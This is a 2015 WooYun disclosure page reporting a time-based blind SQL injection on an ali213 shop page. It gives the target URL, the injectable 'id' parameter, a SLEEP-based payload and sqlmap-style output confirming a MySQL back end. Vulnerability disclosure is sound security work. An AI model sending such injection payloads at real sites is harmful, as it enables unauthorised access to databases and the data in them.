当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-095590

漏洞标题:游侠网某站SQL注入

相关厂商:ali213.net

漏洞作者: 0x 80

提交时间:2015-02-04 13:08

修复时间:2015-02-09 13:10

公开时间:2015-02-09 13:10

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-02-04: 细节已通知厂商并且等待厂商处理中
2015-02-09: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

主要是我不玩游戏的
年轻人少玩游戏!告诫!
游侠网是中国的单机游戏门户,坚守单机阵地!鼎力支持正版游戏产业,弘扬单机文化!
游侠创作室成员在各大杂志媒体包括大众软件、大众游戏、家用电脑与游戏、电脑商情报、电脑报、软件与光盘、电脑游戏攻略、EPLAY等发表文章超过5000篇,多名创作室成员为各大杂志社的特约作者,国内十佳撰稿人的评选中游侠创作室拥有五个席位。
游侠网已与几乎所有厂商和媒体形成了良好的合作关系,网站上也开设了专区,及时发布最新讯息。并且与其他游戏公司联合举办各类市场推广活动,都取得巨大收益,游侠网从中获益匪浅。

详细说明:

http://shop.ali213.com/pay_go.php?id=1118

http://shop.ali213.com/pay_go.php?id=1118


Place: GET
Parameter: id
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: id=1118 AND SLEEP(5)
---
[12:55:18] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL 5.0.11

44.png

漏洞证明:

http://shop.ali213.com/pay_go.php?id=1118

修复方案:

参数

版权声明:转载请注明来源 0x 80@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2015-02-09 13:10

厂商回复:

最新状态:

暂无


漏洞评价:

评论

  1. 2015-02-10 11:07 | 第四维度 ( 实习白帽子 | Rank:58 漏洞数:34 | 谦谦君子,温润如玉)

    修复了呵呵哒

  2. 2015-02-10 11:13 | 0x 80 ( 普通白帽子 | Rank:1301 漏洞数:398 | 某安全公司招聘系统运维、渗透测试、安全运...)

    @第四维度 坑爹的,早知道就不提交了

  3. 2015-02-10 13:52 | 0x 80 ( 普通白帽子 | Rank:1301 漏洞数:398 | 某安全公司招聘系统运维、渗透测试、安全运...)

    @第四维度 坑爹的游侠网